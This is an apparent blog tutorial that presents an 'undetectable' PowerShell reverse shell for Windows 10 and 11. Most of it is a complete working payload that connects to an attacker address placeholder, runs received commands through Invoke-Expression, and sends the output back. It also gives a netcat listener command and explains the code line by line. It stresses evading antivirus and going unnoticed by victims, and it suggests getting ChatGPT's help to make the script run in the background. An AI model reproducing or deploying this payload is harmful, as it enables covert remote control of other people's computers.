Undetectable reverse shell windows 11
Undetectable reverse shell windows 11
Today, I'll share an undetectable reverse shell for Windows 10 and Windows 11.
"Remember, this article is for research and educational purposes only, and I cannot be held responsible for any actions taken based on this information."
What is a Reverse Shell?
A reverse shell is a clever method where the connection is initiated from the target machine, not the attacker's system. This enables attackers to establish an interactive shell session on the victim's computer, even bypassing obstacles like firewalls or network address translation.
Undetectable Reverse Shell
In our demonstration, we'll use a reverse shell that remains invisible to antivirus software. Once the connection is established, it goes undetected, making it difficult for anyone, including the victim, to notice any unusual activity (unless there's a network sniffer present, which is unlikely for regular users).
Payload
$ErrorActionPreference = "Stop"
function Connect-RemoteShell {
param (
[string]$RemoteAddress,
[int]$RemotePort
)
try {
$tcpClient = New-Object Net.Sockets.TCPClient
$result = $tcpClient.BeginConnect($RemoteAddress, $RemotePort, $null, $null)
$wait = $result.AsyncWaitHandle.WaitOne(5000, $false)
if (!$wait -or !$tcpClient.Connected) {
throw "Failed to establish a connection."
}
$stream = $tcpClient.GetStream()
$writer = New-Object IO.StreamWriter($stream)
$reader = New-Object IO.StreamReader($stream)
while ($true) {
$commandPrompt = $reader.ReadLine()
if ($commandPrompt -eq $null) { break }
$output = Invoke-Expression $commandPrompt 2>&1 | Out-String
$writer.WriteLine($output + "
SHELL> ")
$writer.Flush()
}
}
catch {
Write-Host "Failed to establish a connection: $_"
}
finally {
if ($reader) { $reader.Close() }
if ($writer) { $writer.Close() }
if ($tcpClient) { $tcpClient.Close() }
}
}
Connect-RemoteShell -RemoteAddress "YOURIP" -RemotePort 2222
Replace "YOURIP" with the IP address of the attacker's machine and 2222 with the designated listening port.
Explanation of the Payload
The payload is a PowerShell script that establishes a reverse shell connection. Here's a breakdown of its structure and functionality:
- The variable
$ErrorActionPreferenceis set to "Stop", which ensures that any errors encountered during execution will cause an exception to be thrown. - The function
Connect-RemoteShellis defined with two parameters:$RemoteAddressfor the IP address of the remote machine, and$RemotePortfor the port number. - Inside the function, a TCP client is created using
New-Objectto establish a connection to the remote machine. - The
BeginConnectmethod is called on the TCP client object to initiate the connection with the specified IP address and port. It uses an asynchronous operation with a timeout of 5 seconds. - If the connection is not successfully established (if
$waitis false or the TCP client is not connected), an exception is thrown indicating the failure. - If the connection is established, a network stream is obtained from the TCP client, and IO writers and readers are created to handle the communication.
- The code enters a loop that continuously reads a command prompt input from the remote machine's stream. If the input is null, the loop breaks.
- The
Invoke-Expressioncmdlet is used to execute the command prompt input as PowerShell code. The resulting output is captured and converted to a string usingOut-String. - The output is written back to the remote machine's stream along with a "SHELL>" prompt to indicate that it's ready for the next command.
- The loop continues, allowing for an interactive shell session where commands can be executed remotely.
- If any exception occurs during the execution of the function, an error message is displayed.
- The
finallyblock ensures that the IO readers, writers, and TCP client are properly closed regardless of any exceptions.
nc -vnlp 2222
chatgpt can assist with modifying the scripts for running them in the background or executing them in a specific context.After running the payload, we receive our reverse shell connection.
